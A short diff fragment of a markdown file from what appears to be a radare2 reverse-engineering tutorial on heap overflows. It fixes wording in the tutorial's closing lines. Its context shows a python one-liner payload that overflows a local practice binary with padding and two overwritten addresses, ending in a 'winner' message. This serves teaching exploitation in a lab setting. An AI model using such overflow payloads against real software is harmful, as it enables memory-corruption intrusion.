ZigzagSecurity/survival-guide-radare2/heap_overflow.md

 zigzag@System:~/Documents/survival-guide-radare2/ $ ./heapOvf $(python -c "print 'AAAABBBBCCCCDDDDEEEE\x1c\xc0\x04\x08 \xa2\x91\x04\x08'")
 and we have a winner @ 1552847092
 ```
-Here we go, everything works as expected !\
+Here we go, everything works as expected !

-Thanks for reading guys and I hope you learnt some new stuff :)
+Thanks for reading guys and I hope you have learnt some new stuff :)